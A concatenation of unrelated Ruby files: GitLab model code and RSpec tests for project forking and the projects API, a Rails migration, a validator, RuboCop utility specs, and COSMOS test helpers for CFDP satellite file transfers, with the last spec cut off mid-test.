# Assume that groups have at least one project with merge requests enabled.
# Otherwise, we would need to load all of the projects from the database.
true
elsif project_timebox?
project&.merge_requests_enabled?
end
end
def weight_available?
resource_parent&.feature_available?(:issue_weights)
end
private
def timebox_format_reference(format = :iid)
raise ArgumentError, _('Unknown format') unless [:iid, :name].include?(format)
if group_timebox? && format == :iid
raise ArgumentError, _('Cannot refer to a group %{timebox_type} by an internal id!') % { timebox_type: timebox_name }
end
if format == :name && !name.include?('"')
%("#{name}")
else
iid
end
end
# Timebox should be either a project timebox or a group timebox
def timebox_type_check
if group_id && project_id
field = project_id_changed? ? :project_id : :group_id
errors.add(field, _("%{timebox_name} should belong either to a project or a group.") % { timebox_name: timebox_name })
end
end
def start_date_should_be_less_than_due_date
if due_date <= start_date
errors.add(:due_date, _("must be greater than start date"))
end
end
def dates_within_4_digits
if start_date && start_date > Date.new(9999, 12, 31)
errors.add(:start_date, _("date must not be after 9999-12-31"))
end
if due_date && due_date > Date.new(9999, 12, 31)
errors.add(:due_date, _("date must not be after 9999-12-31"))
end
end
def sanitize_title(value)
CGI.unescape_html(Sanitize.clean(value.to_s))
end
end
# ===== hexsha: bfab4387688d87f770ad69173f2c1a41e221e60b =====
# frozen_string_literal: true
require 'spec_helper'
describe 'Project fork' do
include ProjectForksHelper
let(:user) { create(:user) }
let(:project) { create(:project, :public, :repository) }
before do
sign_in user
end
it 'allows user to fork project' do
visit project_path(project)
expect(page).not_to have_css('a.disabled', text: 'Fork')
end
it 'disables fork button when user has exceeded project limit' do
user.projects_limit = 0
user.save!
visit project_path(project)
expect(page).to have_css('a.disabled', text: 'Fork')
end
context 'forking enabled / disabled in project settings' do
before do
project.project_feature.update_attribute(
:forking_access_level, forking_access_level)
end
context 'forking is enabled' do
let(:forking_access_level) { ProjectFeature::ENABLED }
it 'enables fork button' do
visit project_path(project)
expect(page).to have_css('a', text: 'Fork')
expect(page).not_to have_css('a.disabled', text: 'Fork')
end
it 'renders new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(200)
expect(page).to have_text(' Select a namespace to fork the project ')
end
end
context 'forking is disabled' do
let(:forking_access_level) { ProjectFeature::DISABLED }
it 'does not render fork button' do
visit project_path(project)
expect(page).not_to have_css('a', text: 'Fork')
end
it 'does not render new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(404)
end
end
context 'forking is private' do
let(:forking_access_level) { ProjectFeature::PRIVATE }
before do
project.update(visibility_level: Gitlab::VisibilityLevel::INTERNAL)
end
context 'user is not a team member' do
it 'does not render fork button' do
visit project_path(project)
expect(page).not_to have_css('a', text: 'Fork')
end
it 'does not render new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(404)
end
end
context 'user is a team member' do
before do
project.add_developer(user)
end
it 'enables fork button' do
visit project_path(project)
expect(page).to have_css('a', text: 'Fork')
expect(page).not_to have_css('a.disabled', text: 'Fork')
end
it 'renders new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(200)
expect(page).to have_text(' Select a namespace to fork the project ')
end
end
end
end
it 'forks the project', :sidekiq_might_not_need_inline do
visit project_path(project)
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
expect(page).to have_content 'Forked from'
visit project_path(project)
expect(page).to have_content(/new merge request/i)
page.within '.nav-sidebar' do
first(:link, 'Merge Requests').click
end
expect(page).to have_content(/new merge request/i)
page.within '#content-body' do
click_link('New merge request')
end
expect(current_path).to have_content(/#{user.namespace.path}/i)
end
it 'shows avatars when Gravatar is disabled' do
stub_application_setting(gravatar_enabled: false)
visit project_path(project)
click_link 'Fork'
page.within('.fork-thumbnail-container') do
expect(page).to have_css('div.identicon')
end
end
it 'shows the forked project on the list' do
visit project_path(project)
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
visit project_forks_path(project)
forked_project = user.fork_of(project.reload)
page.within('.js-projects-list-holder') do
expect(page).to have_content("#{forked_project.namespace.human_name} / #{forked_project.name}")
end
forked_project.update!(path: 'test-crappy-path')
visit project_forks_path(project)
page.within('.js-projects-list-holder') do
expect(page).to have_content("#{forked_project.namespace.human_name} / #{forked_project.name}")
end
end
context 'when the project is private' do
let(:project) { create(:project, :repository) }
let(:another_user) { create(:user, name: 'Mike') }
before do
project.add_reporter(user)
project.add_reporter(another_user)
end
it 'renders private forks of the project' do
visit project_path(project)
another_project_fork = Projects::ForkService.new(project, another_user).execute
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
visit project_forks_path(project)
page.within('.js-projects-list-holder') do
user_project_fork = user.fork_of(project.reload)
expect(page).to have_content("#{user_project_fork.namespace.human_name} / #{user_project_fork.name}")
end
expect(page).not_to have_content("#{another_project_fork.namespace.human_name} / #{another_project_fork.name}")
end
end
context 'when the user already forked the project' do
before do
create(:project, :repository, name: project.name, namespace: user.namespace)
end
it 'renders error' do
visit project_path(project)
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
expect(page).to have_content "Name has already been taken"
end
end
context 'maintainer in group' do
let(:group) { create(:group) }
before do
group.add_maintainer(user)
end
it 'allows user to fork project to group or to user namespace' do
visit project_path(project)
expect(page).not_to have_css('a.disabled', text: 'Fork')
click_link 'Fork'
expect(page).to have_css('.fork-thumbnail', count: 2)
expect(page).not_to have_css('.fork-thumbnail.disabled')
end
it 'allows user to fork project to group and not user when exceeded project limit' do
user.projects_limit = 0
user.save!
visit project_path(project)
expect(page).not_to have_css('a.disabled', text: 'Fork')
click_link 'Fork'
expect(page).to have_css('.fork-thumbnail', count: 2)
expect(page).to have_css('.fork-thumbnail.disabled')
end
it 'links to the fork if the project was already forked within that namespace', :sidekiq_might_not_need_inline do
forked_project = fork_project(project, user, namespace: group, repository: true)
visit new_project_fork_path(project)
expect(page).to have_css('div.forked', text: group.full_name)
click_link group.full_name
expect(current_path).to eq(project_path(forked_project))
end
end
end
# ===== hexsha: d5d3e3cdadc6ae02358dcf3b706b0ea53232954a =====
class AddAncestryToLocation < ActiveRecord::Migration[5.0]
def change
add_column :locations, :ancestry, :string
add_index :locations, :ancestry
end
end
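# The ancestry gem stores each node's materialized path of ancestor ids in
# this string column, e.g. "1/7" for a location whose ancestors are the
# locations with ids 1 and 7; the index makes subtree lookups cheap.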
# ===== hexsha: 1c73d674ea58a44adf7ab0dff99468cd098c1aac =====
class MyValidator < ActiveModel::Validator
def validate(record)
# Add an error if the name chosen is not unique to the user
if user_already_has_item_with_name?(record) && user_item_is_not_current_item(record)
record.errors[:base] << "You already have a #{record.class.name.downcase} named '#{record.name}'"
end
end
# Return true if the user already has an item with that name
def user_already_has_item_with_name?(record)
user_item_names(record).include?(record.name.downcase)
end
# Return array of item names
def user_item_names(record)
record.user.send(item_plural(record)).all.collect { |item| item.name }
end
# returns true if the item the user is editing is not the one being validated
def user_item_is_not_current_item(record)
User.find_by_slug(:username, record.user.slug(:username)).send(item_plural(record)).find_by_slug(:name, record.slug(:name)).id != record.id
end
def item_plural(record)
record.class.name.downcase + 's'
end
end
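# Hooked up from a model via ActiveModel's validates_with, e.g. (Widget is
# illustrative; the validator expects the record to respond to #user, #name
# and #slug):
#
#   class Widget < ActiveRecord::Base
#     validates_with MyValidator
#   end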
# ===== hexsha: 01ef61eb9959bb01006ce0c2b3cb8dd9fa9d1059 =====
# frozen_string_literal: true
describe RuboCop::Cop::Util do
class TestUtil
include RuboCop::Cop::Util
end
describe '#line_range' do
let(:source) do
<<-END
foo = 1
bar = 2
class Test
def some_method
do_something
end
end
baz = 8
END
end
let(:processed_source) { parse_source(source) }
let(:ast) { processed_source.ast }
let(:node) { ast.each_node.find(&:class_type?) }
context 'when Source::Range object is passed' do
it 'returns line range of that' do
line_range = described_class.line_range(node.loc.expression)
expect(line_range).to eq(3..7)
end
end
context 'when AST::Node object is passed' do
it 'returns line range of the expression' do
line_range = described_class.line_range(node)
expect(line_range).to eq(3..7)
end
end
end
describe 'source indicated by #range_with_surrounding_comma' do
let(:source) { 'raise " ,Error, "' }
let(:processed_source) { parse_source(source) }
let(:input_range) do
Parser::Source::Range.new(processed_source.buffer, 9, 14)
end
subject do
obj = TestUtil.new
obj.instance_exec(processed_source) { |src| @processed_source = src }
r = obj.send(:range_with_surrounding_comma, input_range, side)
processed_source.buffer.source[r.begin_pos...r.end_pos]
end
context 'when side is :both' do
let(:side) { :both }
it { is_expected.to eq(',Error,') }
end
context 'when side is :left' do
let(:side) { :left }
it { is_expected.to eq(',Error') }
end
context 'when side is :right' do
let(:side) { :right }
it { is_expected.to eq('Error,') }
end
end
describe 'source indicated by #range_with_surrounding_space' do
let(:source) { 'f { a(2) }' }
let(:processed_source) { parse_source(source) }
let(:input_range) do
Parser::Source::Range.new(processed_source.buffer, 5, 9)
end
subject do
obj = TestUtil.new
obj.instance_exec(processed_source) { |src| @processed_source = src }
r = obj.send(:range_with_surrounding_space, input_range, side)
processed_source.buffer.source[r.begin_pos...r.end_pos]
end
context 'when side is :both' do
let(:side) { :both }
it { is_expected.to eq(' a(2) ') }
end
context 'when side is :left' do
let(:side) { :left }
it { is_expected.to eq(' a(2)') }
end
context 'when side is :right' do
let(:side) { :right }
it { is_expected.to eq('a(2) ') }
end
end
describe '#to_symbol_literal' do
[
['foo', ':foo'],
['foo?', ':foo?'],
['foo!', ':foo!'],
['@foo', ':@foo'],
['@@foo', ':@@foo'],
['$\\', ':$\\'],
['$a', ':$a'],
['==', ':=='],
['a-b', ":'a-b'"]
].each do |string, expectation|
context "when #{string}" do
it "returns #{expectation}" do
expect(described_class.to_symbol_literal(string)).to eq(expectation)
end
end
end
end
describe '#to_supported_styles' do
subject { described_class.to_supported_styles(enforced_style) }
context 'when EnforcedStyle' do
let(:enforced_style) { 'EnforcedStyle' }
it { is_expected.to eq('SupportedStyles') }
end
context 'when EnforcedStyleInsidePipes' do
let(:enforced_style) { 'EnforcedStyleInsidePipes' }
it { is_expected.to eq('SupportedStylesInsidePipes') }
end
end
end
# ===== hexsha: 38a0ef6ecd793c8826e91e09ad74a4204099d7af =====
# FUNCTIONS
CFDP_CLASS_HASH = {"CFDP::PDUMetadata"=>0, "CFDP::PDUFileData"=>1, "CFDP::PDUFinished"=>2,
"CFDP::PDUNAK"=>3, "CFDP::PDUEOF"=>4, "CFDP::PDUACK"=>5}
def miss_pdus(*args)
miss_sent_hash = args[0][:miss_sent_pdus]
unless miss_sent_hash.nil?
miss_sent_hash.each do |key, value|
cmd("CFDP_TEST MISS_SENT_PACKET with PDU_CLASS #{CFDP_CLASS_HASH[key.to_s]}, PACKET_NUMBER_ARRAY #{value}")
end
end
miss_received_hash = args[0][:miss_received_pdus]
unless miss_received_hash.nil?
miss_received_hash.each do |key, value|
cmd("CFDP_TEST MISS_RECEIVED_PACKET with PDU_CLASS #{CFDP_CLASS_HASH[key.to_s]}, PACKET_NUMBER_ARRAY #{value}")
end
end
wait(1)
end
# This function estimates how long a file transaction should take
def calculateWaitTime(fileSize, link)
# fileSize should be in bytes, so...
# Hypothetical 50% of max performance here.
perf = 0.5
return (fileSize/((link*perf).to_i<<7).to_f).ceil*2
end
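# Worked example (the units of `link` are whatever the caller uses; perf is
# fixed at 0.5 above):
#   calculateWaitTime(65536, 4)
#   # (4*0.5).to_i << 7 = 256; 65536/256.0 = 256.0; ceil * 2 => 512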
# This monkey patch is used to check if a string contains
# multiple substrings (in any order)
class String
def minclude?(arg)
raise ArgumentError unless arg.is_a?(Array)
arg.each do |arg1|
return false unless self.include?(arg1)
end
return true
end
end
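# e.g. "playback file ok".minclude?(["playback", "ok"]) # => true
#      "playback file ok".minclude?(["missing"])        # => false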
# This is a specific function that verifies if TO is available.
# If not, it enables it.
def TO_enabled?(ip, destport, routemask, ifiledesc, default_timeout)
counter = get_tlm_cnt("TO", "TO_HKPACKET")
begin
puts "Verifying if TO is enable"
wait_check_expression("get_tlm_cnt(\"TO\", \"TO_HKPACKET\") > #{counter}", default_timeout)
rescue
puts "TO not enable. Enabling it now!"
cmd("TO TO_ENABLE_OUTPUT with IP \"#{ip}\", DESTPORT #{destport}, ROUTEMASK #{routemask}, IFILEDESC #{ifiledesc}")
wait_check_expression("get_tlm_cnt(\"TO\", \"TO_HKPACKET\") > #{counter}", default_timeout)
end
end
# This is a specific function that verifies if TO is available.
# This is to be called within a test event, so it can contain
# scripting commands for COSMOS.
def TO_available?(default_timeout=5)
puts "Verifying if TO is enabled"
# This function requires that TO_HKPACKET tlm packets are sent by default
counter = get_tlm_cnt("TO", "TO_HKPACKET")
cmd("TO TO_ENABLE_OUTPUT with IP \"#{MY_IP}\", DESTPORT 1235, ROUTEMASK 0, IFILEDESC 0")
wait_check_expression("get_tlm_cnt('TO', 'TO_HKPACKET') > #{counter}", default_timeout)
puts "TO is ok."
end
# This is a specific function that verifies if CF is available.
# This is to be called within a test event, so it can contain
# scripting commands for COSMOS.
def CF_available?(default_timeout)
puts "Verifying if CF is enabled"
# TO must be available in order to check CF
TO_available?(default_timeout)
# This function requires that CF_HKPACKET tlm packets are sent by default
counter = get_tlm_cnt("CF", "CF_HKPACKET")
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter}", default_timeout)
puts "CF is ok."
end
# This function returns the minimal number of PDUs that will be transferred
# for a given file. fileSize must be in kilobytes.
def PDUS?(pdu_size, fileSize)
# fdiv keeps the division in floating point so .ceil can round up; plain
# integer division would truncate first and make .ceil a no-op.
return (fileSize << 10).fdiv(pdu_size).ceil
end
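# e.g. PDUS?(512, 64) # => (64 << 10) / 512.0 = 128.0 -> 128 PDUs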
def appendFile(fileName, text)
return if (text.nil? || fileName.nil?)
File.open(fileName, 'a+') do |file|
file.write(text)
end
end
def downlinkAndCheck(check, classe, channel, priority, preserve, peerID, sourceFileName, destFileName, waitTime)
downlinkTransfer(classe, channel, priority, preserve, peerID, sourceFileName, destFileName, waitTime)
wait(1) # this wait gives the file time to be written
check_expression("#{File.exist?(destFileName)} == #{check}")
wait(1)
end
# This function starts a file downlink transfer on the satellite and
# validates it using CF and TO HK tlm packets
def downlinkTransfer(classe, channel, priority, preserve, peerID, sourceFileName, destFileName, waitTime)
# Initialize counters
counter = get_tlm_cnt("CF", "CF_HKPACKET")
filesSent = tlm("CF CF_HKPACKET ENG_TOTALFILESSENT")
# Ask for a file
cmd("CF CF_PLAYBACK_FILE_CC with CLASS #{classe},
CHANNEL #{channel},
PRIORITY #{priority},
PRESERVE #{preserve},
PEERID \"#{peerID}\",
SRCFILENAME \"#{sourceFileName}\",
DSTFILENAME \"#{destFileName}\""
)
# Wait for successful file transaction
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter} and tlm('CF CF_HKPACKET ENG_TOTALFILESSENT') > #{filesSent}", waitTime)
end
def uplinkTransfer(classe, destID, sourceFileName, destFileName, waitTime, shouldSucess = true)
# Initialize counters
counter = get_tlm_cnt("CF", "CF_HKPACKET")
filesReceived = tlm("CF CF_HKPACKET APP_TOTALSUCCESSTRANS")
totalFailedTrans = tlm("CF CF_HKPACKET APP_TOTALFAILEDTRANS")
# Send file
cmd("CFDP SEND_FILE with CLASS #{classe},
DEST_ID '#{destID}',
SRCFILENAME '#{sourceFileName}',
DSTFILENAME '#{destFileName}'
")
# Wait for successful file transaction
if shouldSucess
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter} and tlm('CF CF_HKPACKET APP_TOTALSUCCESSTRANS') > #{filesReceived}", waitTime)
else
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter} and tlm('CF CF_HKPACKET APP_TOTALFAILEDTRANS') > #{totalFailedTrans}", waitTime)
end
end
def createMainTestDir(current_test_suite, current_test, current_test_case)
time = Time.now
mainTestDir = Cosmos::USERPATH+"/outputs/tests/"
Dir.mkdir(mainTestDir+current_test_suite.to_s) unless Dir.exist?(mainTestDir+current_test_suite.to_s)
Dir.mkdir(mainTestDir+"#{current_test_suite}/#{current_test}") unless Dir.exist?(mainTestDir+"#{current_test_suite}/#{current_test}")
Dir.mkdir(mainTestDir+"#{current_test_suite}/#{current_test}/" + current_test_case.to_s) unless Dir.exist?(mainTestDir+"#{current_test_suite}/#{current_test}/" + current_test_case.to_s)
finalTestDir = mainTestDir+"#{current_test_suite}/#{current_test}/" + current_test_case.to_s
finalTestDir += "/" + time.strftime("%Y%m%d_%H%M%S")
Dir.mkdir(finalTestDir)
Dir.mkdir(finalTestDir+"/input")
Dir.mkdir(finalTestDir+"/output")
return finalTestDir
end
require 'securerandom' # SecureRandom below is not loaded automatically in plain Ruby
def createRandomFile(fileName, size)
File.open(fileName, 'wb+') do |f|
size.to_i.times {
f.write(SecureRandom.random_bytes((1<<10)))
}
end
end
def printFullHash(hash)
return "nil" if (hash.nil? || hash.empty?)
hashoutput = ""
hash.each { |key, value| hashoutput << "#{key}=>#{value.to_s}, " }
return "{#{hashoutput.chop!.chop!}}"
end
# ===== hexsha: f77ab3bd77e08b35057d71ddc0d52b2171a59e66 =====
class Task::Filter::ContactInfoAddr < Task::Filter::Base
def execute_query(tasks, filters)
# We are plucking ids here because the contact filter already generates an sql statement with several nested subqueries
# and sending too many of those to postgres can cause unexpected errors and is often slower than breaking things up.
# Do not change this unless you test the results before pushing to production.
tasks.joins(:contacts)
.where(contacts: { id: Contact::Filter::ContactInfoAddr.query(contact_scope(tasks), filters, account_lists).ids })
end
delegate :custom_options,
:parent,
:type,
:title,
to: 'Contact::Filter::ContactInfoAddr.new(account_lists)'
end
# ===== hexsha: 911e01af2eb2306bda9afdfeea843a51c60653ff =====
# -*- coding: utf-8 -*-
require 'spec_helper'
describe API::Projects do
include Gitlab::CurrentSettings
let(:user) { create(:user) }
let(:user2) { create(:user) }
let(:user3) { create(:user) }
let(:admin) { create(:admin) }
let(:project) { create(:project, namespace: user.namespace) }
let(:project2) { create(:project, path: 'project2', namespace: user.namespace) }
let(:snippet) { create(:project_snippet, :public, author: user, project: project, title: 'example') }
let(:project_member) { create(:project_member, :developer, user: user3, project: project) }
let(:user4) { create(:user) }
let(:project3) do
create(:project,
:private,
:repository,
name: 'second_project',
path: 'second_project',
creator_id: user.id,
namespace: user.namespace,
merge_requests_enabled: false,
issues_enabled: false, wiki_enabled: false,
builds_enabled: false,
snippets_enabled: false)
end
let(:project_member2) do
create(:project_member,
user: user4,
project: project3,
access_level: ProjectMember::MASTER)
end
let(:project4) do
create(:project,
name: 'third_project',
path: 'third_project',
creator_id: user4.id,
namespace: user4.namespace)
end
describe 'GET /projects' do
shared_examples_for 'projects response' do
it 'returns an array of projects' do
get api('/projects', current_user), filter
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(*projects.map(&:id))
end
end
shared_examples_for 'projects response without N + 1 queries' do
it 'avoids N + 1 queries' do
control_count = ActiveRecord::QueryRecorder.new do
get api('/projects', current_user)
end.count
if defined?(additional_project)
additional_project
else
create(:project, :public)
end
expect do
get api('/projects', current_user)
end.not_to exceed_query_limit(control_count + 8)
end
end
let!(:public_project) { create(:project, :public, name: 'public_project') }
before do
project
project2
project3
project4
end
context 'when unauthenticated' do
it_behaves_like 'projects response' do
let(:filter) { { search: project.name } }
let(:current_user) { user }
let(:projects) { [project] }
end
it_behaves_like 'projects response without N + 1 queries' do
let(:current_user) { nil }
end
end
context 'when authenticated as regular user' do
it_behaves_like 'projects response' do
let(:filter) { {} }
let(:current_user) { user }
let(:projects) { [public_project, project, project2, project3] }
end
it_behaves_like 'projects response without N + 1 queries' do
let(:current_user) { user }
end
context 'when some projects are in a group' do
before do
create(:project, :public, group: create(:group))
end
it_behaves_like 'projects response without N + 1 queries' do
let(:current_user) { user }
let(:additional_project) { create(:project, :public, group: create(:group)) }
end
end
it 'includes the project labels as the tag_list' do
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to include('tag_list')
end
it 'includes open_issues_count' do
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to include('open_issues_count')
end
it 'does not include open_issues_count if issues are disabled' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::DISABLED)
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.find { |hash| hash['id'] == project.id }.keys).not_to include('open_issues_count')
end
it "does not include statistics by default" do
get api('/projects', user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first).not_to include('statistics')
end
it "includes statistics if requested" do
get api('/projects', user), statistics: true
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first).to include 'statistics'
end
context 'when external issue tracker is enabled' do
let!(:jira_service) { create(:jira_service, project: project) }
it 'includes open_issues_count' do
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to include('open_issues_count')
expect(json_response.find { |hash| hash['id'] == project.id }.keys).to include('open_issues_count')
end
it 'does not include open_issues_count if issues are disabled' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::DISABLED)
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.find { |hash| hash['id'] == project.id }.keys).not_to include('open_issues_count')
end
end
context 'and with simple=true' do
it 'returns a simplified version of all the projects' do
expected_keys = %w(
id description default_branch tag_list
ssh_url_to_repo http_url_to_repo web_url
name name_with_namespace
path path_with_namespace
star_count forks_count
created_at last_activity_at
)
get api('/projects?simple=true', user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to match_array expected_keys
end
end
context 'and using search' do
it_behaves_like 'projects response' do
let(:filter) { { search: project.name } }
let(:current_user) { user }
let(:projects) { [project] }
end
end
context 'and membership=true' do
it_behaves_like 'projects response' do
let(:filter) { { membership: true } }
let(:current_user) { user }
let(:projects) { [project, project2, project3] }
end
end
context 'and using the visibility filter' do
it 'filters based on private visibility param' do
get api('/projects', user), { visibility: 'private' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(project.id, project2.id, project3.id)
end
it 'filters based on internal visibility param' do
project2.update_attribute(:visibility_level, Gitlab::VisibilityLevel::INTERNAL)
get api('/projects', user), { visibility: 'internal' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(project2.id)
end
it 'filters based on public visibility param' do
get api('/projects', user), { visibility: 'public' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(public_project.id)
end
end
context 'and using sorting' do
it 'returns the correct order when sorted by id' do
get api('/projects', user), { order_by: 'id', sort: 'desc' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first['id']).to eq(project3.id)
end
end
context 'and with owned=true' do
it 'returns an array of projects the user owns' do
get api('/projects', user4), owned: true
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first['name']).to eq(project4.name)
expect(json_response.first['owner']['username']).to eq(user4.username)
end
end
context 'and with starred=true' do
let(:public_project) { create(:project, :public) }
before do
project_member
user3.update_attributes(starred_projects: [project, project2, project3, public_project])
end
it 'returns the starred projects viewable by the user' do
get api('/projects', user3), starred: true
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |project| project['id'] }).to contain_exactly(project.id, public_project.id)
end
end
context 'and with all query parameters' do
let!(:project5) { create(:project, :public, path: 'gitlab5', namespace: create(:namespace)) }
let!(:project6) { create(:project, :public, path: 'project6', namespace: user.namespace) }
let!(:project7) { create(:project, :public, path: 'gitlab7', namespace: user.namespace) }
let!(:project8) { create(:project, path: 'gitlab8', namespace: user.namespace) }
let!(:project9) { create(:project, :public, path: 'gitlab9') }
before do
user.update_attributes(starred_projects: [project5, project7, project8, project9])
end
context 'including owned filter' do
it 'returns only projects that satisfy all query parameters' do
get api('/projects', user), { visibility: 'public', owned: true, starred: true, search: 'gitlab' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.size).to eq(1)
expect(json_response.first['id']).to eq(project7.id)
end
end
context 'including membership filter' do
before do
create(:project_member,
user: user,
project: project5,
access_level: ProjectMember::MASTER)
end
it 'returns only projects that satisfy all query parameters' do
get api('/projects', user), { visibility: 'public', membership: true, starred: true, search: 'gitlab' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.size).to eq(2)
expect(json_response.map { |project| project['id'] }).to contain_exactly(project5.id, project7.id)
end
end
end
end
context 'when authenticated as a different user' do
it_behaves_like 'projects response' do
let(:filter) { {} }
let(:current_user) { user2 }
let(:projects) { [public_project] }
end
end
context 'when authenticated as admin' do
it_behaves_like 'projects response' do
let(:filter) { {} }
let(:current_user) { admin }
let(:projects) { Project.all }
end
end
end
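# For reference, the listing endpoint exercised above maps to a request like
# (hypothetical host and token):
#   curl --header "PRIVATE-TOKEN: <token>" "https://gitlab.example.com/api/v4/projects?visibility=public&owned=true"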
describe 'POST /projects' do
context 'maximum number of projects reached' do
it 'does not create new project and responds with 403' do
allow_any_instance_of(User).to receive(:projects_limit_left).and_return(0)
expect { post api('/projects', user2), name: 'foo' }
.to change { Project.count }.by(0)
expect(response).to have_http_status(403)
end
end
it 'creates new project without path but with name and returns 201' do
expect { post api('/projects', user), name: 'Foo Project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.first
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('foo-project')
end
it 'creates new project without name but with path and returns 201' do
expect { post api('/projects', user), path: 'foo_project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.first
expect(project.name).to eq('foo_project')
expect(project.path).to eq('foo_project')
end
it 'creates new project with name and path and returns 201' do
expect { post api('/projects', user), path: 'path-project-Foo', name: 'Foo Project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.first
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('path-project-Foo')
end
it 'creates last project before reaching project limit' do
allow_any_instance_of(User).to receive(:projects_limit_left).and_return(1)
post api('/projects', user2), name: 'foo'
expect(response).to have_http_status(201)
end
it 'does not create new project without name or path and returns 400' do
expect { post api('/projects', user) }.not_to change { Project.count }
expect(response).to have_http_status(400)
end
it "assigns attributes to project" do
project = attributes_for(:project, {
path: 'camelCasePath',
issues_enabled: false,
jobs_enabled: false,
merge_requests_enabled: false,
wiki_enabled: false,
resolve_outdated_diff_discussions: false,
only_allow_merge_if_pipeline_succeeds: false,
request_access_enabled: true,
only_allow_merge_if_all_discussions_are_resolved: false,
ci_config_path: 'a/custom/path'
})
post api('/projects', user), project
expect(response).to have_http_status(201)
project.each_pair do |k, v|
next if %i[has_external_issue_tracker issues_enabled merge_requests_enabled wiki_enabled].include?(k)
expect(json_response[k.to_s]).to eq(v)
end
# Check feature permissions attributes
project = Project.find_by_path(project[:path])
expect(project.project_feature.issues_access_level).to eq(ProjectFeature::DISABLED)
expect(project.project_feature.merge_requests_access_level).to eq(ProjectFeature::DISABLED)
expect(project.project_feature.wiki_access_level).to eq(ProjectFeature::DISABLED)
end
it 'sets a project as public' do
project = attributes_for(:project, visibility: 'public')
post api('/projects', user), project
expect(json_response['visibility']).to eq('public')
end
it 'sets a project as internal' do
project = attributes_for(:project, visibility: 'internal')
post api('/projects', user), project
expect(json_response['visibility']).to eq('internal')
end
it 'sets a project as private' do
project = attributes_for(:project, visibility: 'private')
post api('/projects', user), project
expect(json_response['visibility']).to eq('private')
end
it 'sets tag list to a project' do
project = attributes_for(:project, tag_list: %w[tagFirst tagSecond])
post api('/projects', user), project
expect(json_response['tag_list']).to eq(%w[tagFirst tagSecond])
end
it 'uploads avatar for a project' do
project = attributes_for(:project, avatar: fixture_file_upload(Rails.root + 'spec/fixtures/banana_sample.gif', 'image/gif'))
post api('/projects', user), project
project_id = json_response['id']
expect(json_response['avatar_url']).to eq("http://localhost/uploads/-/system/project/avatar/#{project_id}/banana_sample.gif")
end
it 'sets a project as allowing outdated diff discussions to automatically resolve' do
project = attributes_for(:project, resolve_outdated_diff_discussions: false)
post api('/projects', user), project
expect(json_response['resolve_outdated_diff_discussions']).to be_falsey
end
it 'sets a project as allowing outdated diff discussions to automatically resolve if resolve_outdated_diff_discussions is true' do
project = attributes_for(:project, resolve_outdated_diff_discussions: true)
post api('/projects', user), project
expect(json_response['resolve_outdated_diff_discussions']).to be_truthy
end
it 'sets a project as allowing merge even if build fails' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: false)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_falsey
end
it 'sets a project as allowing merge only if pipeline succeeds' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: true)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_truthy
end
it 'sets a project as allowing merge even if discussions are unresolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: false)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_falsey
end
it 'sets a project as allowing merge if only_allow_merge_if_all_discussions_are_resolved is nil' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: nil)
post api('/projects', user), project
